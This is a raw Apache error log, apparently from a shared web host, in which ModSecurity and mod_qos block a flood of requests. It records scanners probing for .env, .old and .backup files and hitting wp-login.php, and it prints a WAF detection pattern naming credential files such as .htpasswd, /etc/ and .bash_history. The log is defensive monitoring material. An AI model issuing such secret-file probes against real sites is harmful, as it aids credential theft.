[Tue May 26 19:54:29.776656 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K_LgAAANk
[Tue May 26 19:54:29.784826 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K_LwAAAK0
[Tue May 26 19:54:29.846253 2026] [autoindex:error] [pid 86490:tid 86730] [client 205.210.31.30:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/service.google.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:54:29.903534 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHVZMwN0DpLVWo6K_NQAAAMI
[Tue May 26 19:54:30.098109 2026] [security2:error] [pid 86490:tid 86623] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/microservices/.env"] [unique_id "ahWtHlZMwN0DpLVWo6K_PQAAAIg"]
[Tue May 26 19:54:30.114047 2026] [security2:error] [pid 93576:tid 93617] [remote 103.216.118.192:35728] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.118.216.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtHWDRMqfxdEDkoszQ6gAAVCY"]
[Tue May 26 19:54:30.266035 2026] [security2:error] [pid 86490:tid 86720] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/linkedin/.env"] [unique_id "ahWtHlZMwN0DpLVWo6K_QgAAAOk"]
[Tue May 26 19:54:30.293150 2026] [security2:error] [pid 86490:tid 86678] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-eQAAAL8"]
[Tue May 26 19:54:30.306414 2026] [security2:error] [pid 86490:tid 86742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-fgAAAP8"]
[Tue May 26 19:54:30.320943 2026] [security2:error] [pid 86490:tid 86654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-fwAAAKc"]
[Tue May 26 19:54:30.325638 2026] [security2:error] [pid 86490:tid 86713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-YwAAAOI"]
[Tue May 26 19:54:30.341438 2026] [security2:error] [pid 93868:tid 94324] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHEqK9k_ZUB2Vp25I5AAAAdE"]
[Tue May 26 19:54:30.344835 2026] [security2:error] [pid 86490:tid 86731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-igAAAPQ"]
[Tue May 26 19:54:30.346533 2026] [security2:error] [pid 93868:tid 94276] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHUqK9k_ZUB2Vp25I-AAAAaE"]
[Tue May 26 19:54:30.357158 2026] [security2:error] [pid 86490:tid 86691] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-ngAAAMw"]
[Tue May 26 19:54:30.371233 2026] [security2:error] [pid 86490:tid 86687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-jwAAAMg"]
[Tue May 26 19:54:30.372914 2026] [security2:error] [pid 86490:tid 86745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-nwAAAQI"]
[Tue May 26 19:54:30.373327 2026] [security2:error] [pid 86490:tid 86736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K-4wAAAPk"]
[Tue May 26 19:54:30.376102 2026] [security2:error] [pid 86490:tid 86631] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K-7wAAAJA"]
[Tue May 26 19:54:30.377396 2026] [security2:error] [pid 93868:tid 94278] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHEqK9k_ZUB2Vp25I6AAAAaM"]
[Tue May 26 19:54:30.384305 2026] [security2:error] [pid 86490:tid 86741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-dQAAAP4"]
[Tue May 26 19:54:30.387485 2026] [security2:error] [pid 86490:tid 86747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K-2wAAAQQ"]
[Tue May 26 19:54:30.396134 2026] [security2:error] [pid 86490:tid 86645] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K-5gAAAJ4"]
[Tue May 26 19:54:30.405893 2026] [security2:error] [pid 86490:tid 86628] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K-6AAAAI0"]
[Tue May 26 19:54:30.406568 2026] [security2:error] [pid 86490:tid 86629] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-jAAAAI4"]
[Tue May 26 19:54:30.412612 2026] [security2:error] [pid 93868:tid 94275] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtHUqK9k_ZUB2Vp25JGgAAAaA"]
[Tue May 26 19:54:30.413977 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHUqK9k_ZUB2Vp25JAgAAAeg"]
[Tue May 26 19:54:30.417584 2026] [security2:error] [pid 86490:tid 86724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-lwAAAO0"]
[Tue May 26 19:54:30.418230 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHWDRMqfxdEDkoszQ1wAAAFU"]
[Tue May 26 19:54:30.441227 2026] [security2:error] [pid 93868:tid 94356] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHUqK9k_ZUB2Vp25JAwAAAfE"]
[Tue May 26 19:54:30.447388 2026] [security2:error] [pid 86490:tid 86694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K-4gAAAM8"]
[Tue May 26 19:54:30.450955 2026] [security2:error] [pid 86490:tid 86634] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K-5QAAAJM"]
[Tue May 26 19:54:30.451539 2026] [security2:error] [pid 86490:tid 86624] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-nQAAAIk"]
[Tue May 26 19:54:30.453744 2026] [security2:error] [pid 86490:tid 86662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K-9gAAAK8"]
[Tue May 26 19:54:30.459748 2026] [security2:error] [pid 86490:tid 86633] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K_CQAAAJI"]
[Tue May 26 19:54:30.618121 2026] [security2:error] [pid 93576:tid 93618] [remote 103.216.118.192:35728] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.118.216.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtHmDRMqfxdEDkoszQ6wAAISc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:54:30.773202 2026] [security2:error] [pid 86490:tid 86713] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/aws.php.old"] [unique_id "ahWtHlZMwN0DpLVWo6K_VwAAAOI"]
[Tue May 26 19:54:30.836742 2026] [security2:error] [pid 93576:tid 93834] [client 46.8.23.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtHmDRMqfxdEDkoszQ7QAAAHo"], referer: https://www.anujtradingco.com/
[Tue May 26 19:54:30.980786 2026] [qos:error] [pid 86490:tid 86727] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHlZMwN0DpLVWo6K_ewAAAPA
[Tue May 26 19:54:30.981155 2026] [qos:error] [pid 86490:tid 86639] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHlZMwN0DpLVWo6K_fAAAAJg
[Tue May 26 19:54:30.981450 2026] [qos:error] [pid 86490:tid 86727] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHlZMwN0DpLVWo6K_fQAAAPA
[Tue May 26 19:54:30.982280 2026] [qos:error] [pid 86490:tid 86707] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHlZMwN0DpLVWo6K_fgAAANw
[Tue May 26 19:54:30.988101 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHlZMwN0DpLVWo6K_gAAAAJI
[Tue May 26 19:54:30.989795 2026] [qos:error] [pid 86490:tid 86699] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHlZMwN0DpLVWo6K_gQAAANQ
[Tue May 26 19:54:30.990941 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHlZMwN0DpLVWo6K_ggAAAOc
[Tue May 26 19:54:30.992236 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHlZMwN0DpLVWo6K_gwAAANU
[Tue May 26 19:54:30.995582 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHlZMwN0DpLVWo6K_hAAAAQI
[Tue May 26 19:54:31.009733 2026] [qos:error] [pid 86490:tid 86636] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtH1ZMwN0DpLVWo6K_hQAAAJU
[Tue May 26 19:54:31.131050 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_iAAAAJc
[Tue May 26 19:54:31.135588 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_igAAAI4
[Tue May 26 19:54:31.135739 2026] [qos:error] [pid 86490:tid 86627] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_iwAAAIw
[Tue May 26 19:54:31.138051 2026] [qos:error] [pid 86490:tid 86734] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_jQAAAPc
[Tue May 26 19:54:31.138283 2026] [qos:error] [pid 86490:tid 86730] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_jgAAAPM
[Tue May 26 19:54:31.142336 2026] [qos:error] [pid 86490:tid 86687] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_jwAAAMg
[Tue May 26 19:54:31.143415 2026] [qos:error] [pid 86490:tid 86639] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_kAAAAJg
[Tue May 26 19:54:31.144281 2026] [qos:error] [pid 86490:tid 86727] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_kQAAAPA
[Tue May 26 19:54:31.148279 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_lAAAAJI
[Tue May 26 19:54:31.175745 2026] [qos:error] [pid 86490:tid 86699] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_lQAAANQ
[Tue May 26 19:54:31.278464 2026] [security2:error] [pid 93868:tid 94329] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHUqK9k_ZUB2Vp25JBAAAAdY"]
[Tue May 26 19:54:31.283467 2026] [security2:error] [pid 86490:tid 86745] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/*.env.sample.backup"] [unique_id "ahWtH1ZMwN0DpLVWo6K_lwAAAQI"]
[Tue May 26 19:54:31.292097 2026] [qos:error] [pid 86490:tid 86650] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtH1ZMwN0DpLVWo6K_mwAAAKM
[Tue May 26 19:54:31.292505 2026] [security2:error] [pid 93868:tid 94314] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHUqK9k_ZUB2Vp25JCwAAAcc"]
[Tue May 26 19:54:31.293880 2026] [security2:error] [pid 93868:tid 94385] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHEqK9k_ZUB2Vp25I5QAAAg4"]
[Tue May 26 19:54:31.295781 2026] [security2:error] [pid 86490:tid 86705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K-7QAAANo"]
[Tue May 26 19:54:31.301891 2026] [security2:error] [pid 93868:tid 94380] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHUqK9k_ZUB2Vp25JBgAAAgk"]
[Tue May 26 19:54:31.306033 2026] [security2:error] [pid 86490:tid 86670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K_CAAAALc"]
[Tue May 26 19:54:31.316482 2026] [security2:error] [pid 86490:tid 86679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K_EgAAAMA"]
[Tue May 26 19:54:31.322715 2026] [security2:error] [pid 86490:tid 86657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K--gAAAKo"]
[Tue May 26 19:54:31.324445 2026] [security2:error] [pid 86490:tid 86712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K_EQAAAOE"]
[Tue May 26 19:54:31.336275 2026] [security2:error] [pid 86490:tid 86665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K_EwAAALI"]
[Tue May 26 19:54:31.343769 2026] [security2:error] [pid 93868:tid 94296] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHUqK9k_ZUB2Vp25JBwAAAbU"]
[Tue May 26 19:54:31.347839 2026] [security2:error] [pid 86490:tid 86685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K_BgAAAMY"]
[Tue May 26 19:54:31.348786 2026] [security2:error] [pid 86490:tid 86698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K-3QAAANM"]
[Tue May 26 19:54:31.353237 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHWDRMqfxdEDkoszQ3wAAAAM"]
[Tue May 26 19:54:31.372167 2026] [security2:error] [pid 86490:tid 86715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K_GAAAAOQ"]
[Tue May 26 19:54:31.374242 2026] [security2:error] [pid 86490:tid 86732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHVZMwN0DpLVWo6K_DAAAAPU"]
[Tue May 26 19:54:31.378121 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtHWDRMqfxdEDkoszQ5QAAAAQ"]
